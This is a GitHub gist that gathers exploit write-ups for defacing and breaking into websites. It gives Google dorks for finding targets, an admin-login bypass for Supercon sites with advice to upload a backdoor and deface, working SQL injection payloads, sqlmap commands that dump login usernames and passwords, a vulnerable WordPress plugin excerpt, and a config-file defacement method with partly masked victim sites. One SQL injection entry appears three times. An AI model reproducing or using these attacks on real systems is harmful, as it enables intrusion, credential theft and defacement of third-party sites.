Skip to content

Instantly share code, notes, and snippets.

@dreadpiratesr
Created November 5, 2015 16:21
Show Gist options
  • Save dreadpiratesr/2dab641a16c2d9bad7c9 to your computer and use it in GitHub Desktop.
Save dreadpiratesr/2dab641a16c2d9bad7c9 to your computer and use it in GitHub Desktop.
Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.
Vulnerability Details
———————
First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”]
Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer
Now, go to it’s admin page http://www.targetsite.com/webadmin/login.php
After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php
And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) .
Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution
Google Dork : inurl:wp-content/plugins/better-wp-security
Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php
Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php
public function admin_tooltip_ajax() {
global $itsec_globals;
if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce(
sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) {
die ();
}
if ( sanitize_text_field( $_POST['module'] ) == 'close' ) {
$data = $itsec_globals['data'];
$data['tooltips_dismissed'] = true;
update_site_option( 'itsec_data', $data );
} else {
call_user_func_array( $this->tooltip_modules[ sanitize_text_field(
$_POST['module'] ) ]['callback'], array() );
}
die(); // this is required to return a proper result
}
Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php
Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php
Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php
Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
Dork Google: inurl:/admin-ajax.php?action=go_view_object
######################
Poc via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
Polish CMS - SQL Injection
{-} Vulnerable Versions => All Versions So Far.
{x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl
{x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl
——————————————————————————————————————————–
File:
index.php {HomePage}
Vulnerable Parameters:
[id] , [j] , [s] , [lang]
Administration Panel:
/admin/
Exploit Title: PRIVATE CSR
Google Dork : inurl:/“config/config.izo”
# Priv8 SCR Editors
#
#######################################################
# Use Editors To Edit Config Files And Deafce The Site Via CSR Editors.
#######################################################
#
# [+] Example:
#http://lom-radioX.com/config/config.izo
#http://kesbangpolbuXlukumba.info/config/config.izo
#http://www.mirgosXtinits.ru/config/config.izo
#http://sacredodysXsey.com/config/config.izo
#http://www.biohXgienica.com/config/config.izo
#######################################################
# [+] Deface Page: www.site.com/config/tar.tmp
#######################################################
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment